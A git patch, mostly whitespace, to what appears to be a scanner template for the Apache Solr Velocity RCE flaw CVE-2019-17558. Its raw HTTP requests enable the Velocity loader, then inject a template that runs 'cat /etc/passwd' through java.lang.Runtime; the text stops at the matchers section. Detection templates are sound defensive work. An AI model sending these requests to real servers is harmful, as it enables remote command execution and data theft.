From 39cfec87ae866a991180e5504f774bfbf19b1fbc Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Thu, 3 Sep 2020 22:44:42 +0530 Subject: [PATCH] Update CVE-2019-17558.yaml --- cves/CVE-2019-17558.yaml | 67 ++++++++++++++++++++-------------------- 1 file changed, 34 insertions(+), 33 deletions(-) diff --git a/cves/CVE-2019-17558.yaml b/cves/CVE-2019-17558.yaml index 70177eb194..4e9d4c7aa2 100644 --- a/cves/CVE-2019-17558.yaml +++ b/cves/CVE-2019-17558.yaml @@ -5,46 +5,47 @@ info: author: pikpikcu severity: critical -# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133 <--good reference and it works +# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133 # https://nvd.nist.gov/vuln/detail/CVE-2019-17558 # Issues:-https://issues.apache.org/jira/browse/SOLR-13971 requests: - - raw: # Request: set "params.resource.loader.enabled" - - | - POST /solr/atom/config HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Content-Type: application/json - Content-Length: 259 - Upgrade-Insecure-Requests: 1 + - raw: # Request: set "params.resource.loader.enabled" + - | + POST /solr/atom/config HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Content-Type: application/json + Content-Length: 259 + Upgrade-Insecure-Requests: 1 - { - "update-queryresponsewriter": { - "startup": "lazy", - "name": "velocity", - "class": "solr.VelocityResponseWriter", - "template.base.dir": "", - "solr.resource.loader.enabled": "true", - "params.resource.loader.enabled": "true" + { + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } } - } - # RCE via velocity template: - # Get /etc/passwd - - | - GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 + # RCE via velocity template: + # Get /etc/passwd + + - | + GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: